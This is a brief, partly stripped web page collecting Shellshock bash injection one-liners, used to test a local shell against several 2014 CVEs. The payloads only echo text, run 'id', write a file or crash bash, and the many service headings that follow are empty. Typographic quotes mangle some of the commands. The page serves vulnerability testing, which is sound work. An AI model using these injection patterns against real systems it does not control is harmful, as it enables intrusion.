Shellshocker Proof of Concept collection

Command Line (Linux, OSX, and Windows via Cygwin)

  • bashcheck – script to test for the latest vulns

CVE-2014-6271

  • env X='() { :; }; echo “CVE-2014-6271 vulnerable”‘ bash -c id

CVE-2014-7169

will create a file named echo in cwd with date in it, if vulnerable

  • env X='() { (a)=>\’ bash -c “echo date”; cat echo

CVE-2014-7186

  • bash -c ‘true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF’ || echo “CVE-2014-7186 vulnerable, redir_stack”

CVE-2014-7187

  • (for x in {1..200} ; do echo “for x$x in ; do :”; done; for x in {1..200} ; do echo done ; done) | bash || echo “CVE-2014-7187 vulnerable, word_lineno”

CVE-2014-6278

  • () { _; } >_[$($())] { echo hi mom; id; }

CVE-2014-6277

will segfault if vulnerable

IBM z/OS –

HTTP

Phusion Passenger

DHCP

SSH

OSX

SIP

Qmail

Postfix

FTP

OpenVPN

Oracle

TMNT

Hand

Speculation:(Non-confirmed possibly vulnerable)

OFFICIAL SOURCE